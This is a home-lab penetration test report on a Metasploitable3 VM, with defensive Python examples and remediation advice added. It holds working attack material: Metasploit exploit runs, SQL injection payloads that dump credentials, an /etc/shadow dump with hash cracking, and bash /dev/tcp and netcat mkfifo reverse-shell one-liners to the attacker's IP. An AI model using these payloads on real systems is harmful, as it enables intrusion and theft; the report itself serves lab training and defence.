🛡️ Metasploitable3 — Home Lab Penetration Test Report

Author: Sudo-Creator
Environment: VirtualBox · Kali Linux (Attacker) · Metasploitable3 Ubuntu 14.04 (Target)
Target IP: 10.0.2.5
Scope: Full network penetration test — enumeration, exploitation, and post-exploitation
Type: Home Lab / Capture The Flag Practice


🖥️ Lab Environment

| Component | Details |
| --- | --- |
| Hypervisor | Oracle VirtualBox |
| Attacker Machine | Kali Linux |
| Target Machine | Metasploitable3 (Ubuntu 14.04.6 LTS) |
| Target MAC | 08:00:27:BD:86:A4 (Oracle VirtualBox NIC) |
| Network | Internal / Host-Only Adapter |

Phase 1 — Host Discovery & Port Scanning

Nmap Full Port Scan

A comprehensive Nmap scan was performed against the target to identify open ports, running services, and the operating system.

sudo nmap -O -sV -p- -oA metasploitable3 10.0.2.5

Flags used:

| Flag | Purpose |
| --- | --- |
| -O | OS detection |
| -sV | Service/version detection |
| -p- | Scan all 65535 ports |
| -oA | Save output in all formats |

Scan Results

PORT     STATE   SERVICE     VERSION
21/tcp   open    ftp         ProFTPD 1.3.5
22/tcp   open    ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
80/tcp   open    http        Apache httpd 2.4.7 (Ubuntu)
445/tcp  open    netbios-ssn Samba smbd 3.X - 4.X
631/tcp  open    ipp         CUPS 1.7
3306/tcp open    mysql       MySQL (unauthorized)
3500/tcp open    http        WEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcp open    irc         UnrealIRCd
8080/tcp open    http        Jetty 8.1.7.v20120910

OS Detection: Linux (Ubuntu 14.04), Kernel 3.13.0-170-generic


Phase 2 — Service Enumeration

Port 21 — FTP (ProFTPD 1.3.5)

ProFTPD 1.3.5 is known to be vulnerable to the mod_copy command execution vulnerability (CVE-2015-3306). The SITE CPFR/CPTO commands allow any unauthenticated user to copy arbitrary files across the filesystem with the privileges of the ProFTPD daemon (nobody user by default). This can be abused to copy a PHP payload into the web root for remote code execution.

Port 22 — SSH (OpenSSH 6.6.1p1)

The SSH service banner reveals a significantly outdated version of OpenSSH. Metasploit's auxiliary/scanner/ssh/ssh_version scanner confirmed the server supports multiple deprecated algorithms, including arcfour, blowfish-cbc, 3des-cbc, diffie-hellman-group1-sha1, and ecdsa-sha2-nistp256 (weak elliptic curve). No publicly exploitable RCE was identified for this version, but the deprecated cipher suite is a significant weakness.

Port 80 — HTTP (Apache 2.4.7 + Drupal 7.5)

  • Visiting http://10.0.2.5 revealed a Drupal 7.5 CMS installation.
  • The Drupal version was confirmed via CHANGELOG.txt.
  • A robots.txt review exposed several sensitive endpoints: /admin/, /install.php, /update.php, /xmlrpc.php, etc.
  • A secondary application payroll_app.php was discovered and found to be vulnerable to UNION-based SQL injection.
  • Apache 2.4.7 is also susceptible to mod_rewrite SSRF via unsafe [P] flag usage.

Port 445 — SMB (Samba)

The target machine was running Samba. The version appeared to have been spoofed during Metasploit testing, preventing reliable exploitation during this engagement.

Port 6697 — IRC (UnrealIRCd)

The IRC service was running UnrealIRCd. This service is notorious for a critical backdoor vulnerability in version 3.2.8.1 (CVE-2010-2075) that allows unauthenticated remote command execution.

Port 3306 — MySQL

MySQL was running but returned an unauthorized banner, indicating it was not directly accessible without credentials.


Phase 3 — Exploitation


1. UnrealIRCd Backdoor — Port 6697

CVE: CVE-2010-2075
Module: exploit/unix/irc/unreal_ircd_3281_backdoor
Result: ✅ Shell as boba_fett

UnrealIRCd 3.2.8.1 contains a backdoor introduced via a compromised source code distribution. Sending a specially crafted string to the IRC port triggers command execution on the server.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(...) > set LHOST 10.147.62.126
msf exploit(...) > set RHOST 10.147.62.192
msf exploit(...) > set RPORT 6697
msf exploit(...) > set payload cmd/unix/reverse_perl
msf exploit(...) > run
[*] Started reverse TCP handler on 10.147.62.126:4444
[*] 10.147.62.192:6697 - Sending IRC backdoor command
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53611)

whoami
boba_fett

pwd
/opt/unrealircd/Unreal3.2

Note: The initial shell landed in the UnrealIRCd directory as boba_fett. Navigation to other directories was restricted by the user's privilege level, confirming this was a low-privilege foothold.


2. Drupal Drupageddon — SQLi — Port 80

CVE: CVE-2014-3704 (Drupageddon)
Module: exploit/multi/http/drupal_drupageddon
Result: ✅ Shell as www-data

Drupal 7.x before 7.32 is vulnerable to a critical SQL injection in the database abstraction layer. This allows unauthenticated attackers to execute arbitrary queries, ultimately leading to remote code execution.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(...) > set RHOSTS 10.147.62.192
msf exploit(...) > set payload php/reverse_perl
msf exploit(...) > run
[*] Started reverse TCP handler on 10.147.62.126:4444
[*] Command shell session 1 opened (10.147.62.126:4444 -> 10.147.62.192:53682)

whoami
www-data

Post-exploitation enumeration from this shell:

Drupal version confirmed:

cat CHANGELOG.txt
# Drupal 7.5, 2011-07-27

System users discovered:

ls ../../../../../../home

anakin_skywalker   artoo_detoo   ben_kenobi   boba_fett
c_three_pio        chewbacca     darth_vader  greedo
han_solo           jabba_hutt    jarjar_binks kylo_ren
lando_calrissian   leia_organa   luke_skywalker vagrant

3. SQL Injection — Payroll App

Type: UNION-Based SQL Injection (Manual)
Target: http://10.0.2.5/payroll_app.php
Result: ✅ Full database dump including plaintext credentials

The payroll_app.php login form was tested with SQL injection payloads. A basic authentication bypass confirmed the vulnerability, and further UNION-based payloads enumerated the full database.

Authentication Bypass:

' or 1=1#

This returned all records from the users table, including username, first_name, last_name, and salary, confirming that the underlying query returns four columns (the count a UNION payload must match).

Database Version:

' UNION SELECT null, null, @@version, null#
-- Result: 5.5.62-0ubuntu0.14.04.1

Enumerate Databases:

' UNION SELECT null,null,GROUP_CONCAT(schema_name),null FROM information_schema.schemata#
-- Result: information_schema | drupal | mysql | payroll | performance_schema

Enumerate Tables in payroll:

' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,table_name,0x7C)
  FROM information_schema.tables WHERE table_schema='payroll'#
-- Result: users

Enumerate Columns in users:

' UNION SELECT null,null,null,GROUP_CONCAT(0x7c,column_name,0x7C)
  FROM information_schema.columns WHERE table_name='users'#
-- Result: uid | name | pass | username | first_name | last_name | password | salary | ...

Dump Credentials:

' UNION SELECT username, password, salary, null FROM users#
| Username | Password | Salary |
| --- | --- | --- |
| leia_organa | help_me_obiwan | 9560 |
| luke_skywalker | like_my_father_beforeme | 1080 |
| han_solo | nerf_herder | 1200 |
| artoo_detoo | b00p_b33p | 22222 |
| c_three_pio | Pr0t0c07 | 3200 |
| ben_kenobi | thats_no_m00n | 10000 |
| darth_vader | Dark_syD3 | 6666 |
| anakin_skywalker | but_master:( | 1025 |
| jarjar_binks | mesah_p@ssw0rd | 2048 |
| lando_calrissian | @dm1n1str8r | 40000 |
| boba_fett | mandalorian1 | 20000 |
| jabba_hutt | my_kinda_skum | 65000 |
| greedo | hanSh0tF1rst | 50000 |
| chewbacca | rwaaaaawr8 | 4500 |
| kylo_ren | Daddy_Issues2 | 6667 |
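The injection above works because payroll_app.php splices the submitted username straight into its SQL string. The following Python example, added here and not part of the original report, reproduces that pattern against a constructed SQLite stand-in for the payroll table and contrasts it with the parameterised query the remediation section calls for; the column layout and sample rows are assumptions, and the report's trailing `#` becomes `-- ` because SQLite does not treat `#` as a comment.

```python
import sqlite3

# Constructed stand-in for the payroll database, not the lab's real schema:
# the four columns the report's UNION payloads targeted plus the plaintext
# password column it dumped. SQLite replaces MySQL so this runs offline;
# SQLite does not treat '#' as a comment, so the report's trailing '#' is
# written as the standard '-- ' terminator in the payloads below.
SAMPLE_ROWS = [
    ("leia_organa", "help_me_obiwan", "Leia", "Organa", 9560),
    ("han_solo", "nerf_herder", "Han", "Solo", 1200),
]
BYPASS = "' or 1=1-- "
DUMP = "' UNION SELECT username, password, salary, null FROM users-- "

def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, "
               "first_name TEXT, last_name TEXT, salary INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return db

def login_vulnerable(db, user, pw):
    # The pattern behind payroll_app.php: user input spliced into the SQL
    # string, so a quote in the input ends the literal and the remainder is
    # parsed as SQL. Returns every row the rewritten query selects.
    sql = ("SELECT username, first_name, last_name, salary FROM users "
           f"WHERE username='{user}' AND password='{pw}'")
    return db.execute(sql).fetchall()

def login_parameterised(db, user, pw):
    # The report's remediation: a prepared statement. The input is bound as
    # a value, so quotes, OR and UNION never reach the SQL parser.
    sql = ("SELECT username, first_name, last_name, salary FROM users "
           "WHERE username=? AND password=?")
    return db.execute(sql, (user, pw)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, bypass:   ", login_vulnerable(db, BYPASS, "x"))
    print("vulnerable, dump:     ", login_vulnerable(db, DUMP, "x"))
    print("parameterised, bypass:", login_parameterised(db, BYPASS, "x"))
    print("parameterised, valid: ", login_parameterised(db, "han_solo", "nerf_herder"))
```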

4. SSH Login — Credential Reuse — Port 22

Module: auxiliary/scanner/ssh/ssh_login
Result: ✅ Shell as vagrant (sudo ALL privileges)

SSH version enumeration was performed first to fingerprint the server:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(...) > set RHOSTS 10.147.62.192
msf auxiliary(...) > run
SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13

The scan confirmed numerous deprecated cipher algorithms, including arcfour256, blowfish-cbc, 3des-cbc, arcfour128, and deprecated key exchange methods including diffie-hellman-group1-sha1. This indicates the system is severely out of date.

The default Metasploitable3 credential pair vagrant:vagrant was then tested:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(...) > set RHOST 10.147.62.192
msf auxiliary(...) > set USERNAME vagrant
msf auxiliary(...) > set PASSWORD vagrant
msf auxiliary(...) > set THREADS 3
msf auxiliary(...) > run
[+] 10.147.62.192:22 - Success: 'vagrant:vagrant'
    uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
[*] SSH session 1 opened

Privilege Check:

sudo -l

User vagrant may run the following commands on metasploitable3-ub1404:
    (ALL : ALL) ALL
    (ALL : ALL) NOPASSWD: ALL

The vagrant user has full unrestricted sudo access with no password required, effectively equivalent to root.

Shell upgraded to interactive PTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

5. ProFTPD mod_copy — Port 21

CVE: CVE-2015-3306
Module: exploit/unix/ftp/proftpd_modcopy_exec
Result: ⚠️ Module failed against this target instance

The FTP service was identified as ProFTPD 1.3.5. While the proftpd_modcopy_exec Metasploit module exists for this vulnerability, it did not succeed against this Metasploitable3 instance. This may be due to specific configuration differences or restrictions in this build.

Vulnerability Summary: The mod_copy module allows unauthenticated users to copy files via SITE CPFR / SITE CPTO commands with the daemon's privileges, which can be chained with a webshell for RCE.


Phase 4 — Privilege Escalation

Path 1 — Sudo via SSH (vagrant)

The vagrant user already had NOPASSWD: ALL sudo rights, granting immediate root-level access:

sudo su
id
# uid=0(root) gid=0(root) groups=0(root)

Path 2 — Sudo via Credential Reuse (luke_skywalker)

Credentials dumped from the SQL injection were tested over SSH. luke_skywalker:like_my_father_beforeme was valid:

ssh luke_skywalker@10.147.62.192

sudo -l
# User luke_skywalker may run the following commands:
#     (ALL : ALL) ALL

luke_skywalker also had full sudo access. This allowed dumping /etc/shadow:

vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/...
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0
# ... (all 16 hashes dumped)

Offline Hash Cracking Attempt (John the Ripper):

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt hashes.txt

The session was aborted due to hardware speed limitations before cracking completed. The hashes use md5crypt ($1$) which is a relatively weak hashing scheme and would be crackable given sufficient compute time.

Proof of Compromise (PoC) — User Creation:

sudo useradd dean
sudo usermod -a -G audio dean
id
# uid=0(root) gid=0(root) groups=0(root)

su dean
id
# uid=1001(dean) gid=1001(dean) groups=1001(dean),29(audio)
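The two conditions that made this phase trivial, a NOPASSWD: ALL sudo grant and md5crypt ($1$) hashes in /etc/shadow, are both findable by a scripted audit before an attacker finds them. This Python example is added here rather than taken from the report; it checks constructed /etc/sudoers and /etc/shadow lines for exactly those conditions (the sample entries and placeholder hashes are assumptions, not the target's values).

```python
import re

# Constructed /etc/sudoers and /etc/shadow lines modelled on the report's
# findings; the hashes are synthetic placeholders, not the target's values.
SUDOERS_LINES = [
    "root ALL=(ALL:ALL) ALL",
    "vagrant ALL=(ALL:ALL) NOPASSWD: ALL",
    "luke_skywalker ALL=(ALL:ALL) ALL",
    "deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app",
]
SHADOW_LINES = [
    "vagrant:$6$EXAMPLEsalt$EXAMPLEhash:18000:0:99999:7:::",
    "leia_organa:$1$EXAMPLEsalt$EXAMPLEhash:18000:0:99999:7:::",
    "sync:*:18000:0:99999:7:::",
    "kylo_ren:$y$j9T$EXAMPLEsalt$EXAMPLEhash:18000:0:99999:7:::",
    "guest::18000:0:99999:7:::",
]
SUDO_RE = re.compile(r"^(?P<who>\S+)\s+\S+=\([^)]*\)\s*(?P<rest>.*)$")
TAG_RE = re.compile(r"^(?:NO)?(?:PASSWD|EXEC|SETENV):\s*")
SCHEMES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
           "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt",
           "$argon2id$": "argon2id"}
WEAK = {"descrypt", "md5crypt"}  # traditional DES crypt and MD5-based crypt

def audit_sudoers(lines):
    # Flag non-root entries whose command list is ALL; NOPASSWD makes it critical.
    findings = []
    for line in lines:
        m = SUDO_RE.match(line.strip())
        if not m or m["who"] == "root":
            continue
        rest, tags = m["rest"], set()
        while (t := TAG_RE.match(rest)):  # peel off NOPASSWD:/NOEXEC:/SETENV: tags
            tags.add(t.group(0).rstrip(": "))
            rest = rest[t.end():]
        if rest.strip() == "ALL":
            findings.append((m["who"], "critical" if "NOPASSWD" in tags else "high"))
    return findings

def audit_shadow(lines):
    # Flag empty password fields and weak crypt(3) schemes, identified by prefix.
    findings = []
    for line in lines:
        user, field = line.split(":", 2)[:2]
        if field == "":
            findings.append((user, "empty password"))
        elif field[0] not in "!*":  # skip locked / no-login accounts
            scheme = next((n for p, n in SCHEMES.items() if field.startswith(p)),
                          "descrypt" if not field.startswith("$") else "unknown")
            if scheme in WEAK or scheme == "unknown":
                findings.append((user, scheme))
    return findings
```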

Phase 5 — Post Exploitation & Reverse Shells

Multiple reverse shell techniques were demonstrated using msfvenom to generate payloads and netcat as the listener.

Bash Reverse Shell

msfvenom -p cmd/unix/reverse_bash LHOST=10.147.62.126 LPORT=4444 R
# Payload: bash -c '0<&217-;exec 217<>/dev/tcp/10.147.62.126/4444;sh <&217 >&217 2>&217'

Listener:

nc -lnvp 4444

Callback received:

connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60784
whoami
vagrant

Netcat Reverse Shell (mkfifo)

msfvenom -p cmd/unix/reverse_netcat LHOST=10.147.62.126 LPORT=4444 R
# Payload: mkfifo /tmp/kghs; nc 10.147.62.126 4444 0</tmp/kghs | /bin/sh >/tmp/kghs 2>&1; rm /tmp/kghs

Callback received:

connect to [10.147.62.126] from (UNKNOWN) [10.147.62.192] 60795
whoami
vagrant
id
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)

PHP Reverse Shell

msfvenom -p php/unix/cmd/reverse_python LHOST=10.147.62.126 LPORT=4444 R > reverse.php

The payload was saved to reverse.php, uploaded to the target via SSH, and executed:

php reverse.php

Callback received from the PHP payload via the Apache web server's PHP interpreter, confirming remote code execution through the web stack.
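The bash /dev/tcp and mkfifo-plus-nc payloads shown above leave recognisable command lines on the compromised host. The following Python detection example is added here and is not part of the report; it scans constructed ps-style lines (an assumption, not lab output) for those two shapes, for a bare outbound nc to an IP and port, and for the pty.spawn upgrade used in Phase 4.

```python
import re

# Constructed `ps -eo pid,user,args` style lines, not captured from the lab;
# the two payload shapes are the ones the report's msfvenom commands produced.
PROCESS_LINES = [
    "1203 www-data /usr/sbin/apache2 -k start",
    "2290 vagrant bash -c 0<&217-;exec 217<>/dev/tcp/10.147.62.126/4444;sh <&217 >&217 2>&217",
    "2311 vagrant sh -c mkfifo /tmp/kghs; nc 10.147.62.126 4444 0</tmp/kghs | /bin/sh >/tmp/kghs 2>&1; rm /tmp/kghs",
    "2312 vagrant nc 10.147.62.126 4444",
    '2415 vagrant python3 -c import pty; pty.spawn("/bin/bash")',
    "2500 vagrant nc -l -p 8080",
    "2600 root sshd: vagrant [priv]",
]

# Each indicator: label and regex; capture groups, where present, are the remote IP and port.
INDICATORS = [
    ("bash /dev/tcp reverse shell",
     re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d+)")),
    ("netcat mkfifo reverse shell",
     re.compile(r"mkfifo\s+\S+.*\bnc\b\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)")),
    ("outbound netcat to IP:port (review)",
     re.compile(r"^(?:\S*/)?nc(?:at)?\s+(?!-l)(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)")),
    ("pty.spawn shell upgrade",
     re.compile(r"\bpty\.spawn\(")),
]

def scan_processes(lines):
    # One hit per flagged process: pid, user, indicator label, remote (ip, port) or ().
    hits = []
    for line in lines:
        pid, user, args = line.split(None, 2)
        for label, rx in INDICATORS:
            m = rx.search(args)
            if m:
                hits.append({"pid": int(pid), "user": user,
                             "indicator": label, "remote": m.groups()})
                break  # report the most specific indicator only
    return hits

if __name__ == "__main__":
    for hit in scan_processes(PROCESS_LINES):
        print(hit)
```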


📊 Findings Summary

| # | Vulnerability | Port | Severity | Result |
| --- | --- | --- | --- | --- |
| 1 | UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075) | 6697 | 🔴 Critical | Shell as boba_fett |
| 2 | Drupal Drupageddon SQLi (CVE-2014-3704) | 80 | 🔴 Critical | Shell as www-data |
| 3 | UNION-Based SQL Injection — Payroll App | 80 | 🔴 Critical | Full DB dump + plaintext creds |
| 4 | SSH Default Credentials (vagrant:vagrant) | 22 | 🔴 Critical | Root-level access (NOPASSWD sudo) |
| 5 | Credential Reuse — luke_skywalker SSH | 22 | 🔴 Critical | Root-level access (sudo ALL) |
| 6 | Shadow File Dumped — md5crypt Hashes | N/A | 🔴 Critical | 16 hashes extracted |
| 7 | ProFTPD 1.3.5 mod_copy (CVE-2015-3306) | 21 | 🟠 High | Not exploitable in this build |
| 8 | Deprecated SSH Cipher Suite | 22 | 🟡 Medium | Info only — legacy algos confirmed |
| 9 | Drupal CHANGELOG.txt / robots.txt exposed | 80 | 🟡 Medium | Version disclosure |
| 10 | Plaintext Credentials in Database | 3306 | 🔴 Critical | Passwords stored in cleartext |

🔧 Remediation Recommendations

| Finding | Recommendation |
| --- | --- |
| UnrealIRCd Backdoor | Upgrade to a patched, verified version of UnrealIRCd; verify source integrity with checksums |
| Drupal Drupageddon | Upgrade Drupal to the latest stable release; apply security patches immediately |
| SQL Injection (Payroll) | Use parameterised queries / prepared statements; never concatenate user input into SQL |
| Default SSH Credentials | Remove or rotate default vagrant credentials; enforce key-based authentication only |
| Credential Reuse | Enforce unique passwords per service; implement a password policy |
| Weak Password Hashing | Replace md5crypt ($1$) with bcrypt or Argon2id; never store passwords in plaintext |
| Deprecated SSH Ciphers | Harden sshd_config to disable all deprecated algorithms; upgrade to OpenSSH 9.x+ |
| Sudo Misconfiguration | Remove NOPASSWD: ALL grants; apply least-privilege sudo rules per user |
| Version Disclosure | Restrict access to CHANGELOG.txt, robots.txt, and sensitive configuration files |
| ProFTPD mod_copy | Disable mod_copy in proftpd.conf or upgrade to a patched version |

🛠️ Tools Used

| Tool | Purpose |
| --- | --- |
| nmap | Port scanning, service/version detection, OS fingerprinting |
| Metasploit Framework | Exploitation, auxiliary scanners, session management |
| msfvenom | Reverse shell payload generation |
| netcat (nc) | Reverse shell listener |
| John the Ripper | Offline password hash cracking |
| SSH | Remote access and payload delivery |
| Manual SQL Injection | UNION-based injection via browser / curl |

⚠️ Disclaimer

This penetration test was conducted exclusively within a personal home lab environment using intentionally vulnerable software (Metasploitable3 by Rapid7). All activity was performed on isolated virtual machines with no connection to any production network, third-party systems, or external infrastructure.

This report is intended solely for educational purposes and personal skill development. Performing any of these techniques against systems without explicit written permission is illegal and unethical.

The author does not condone unauthorised access to computer systems.


Built with 🔐 by Sudo-Creator
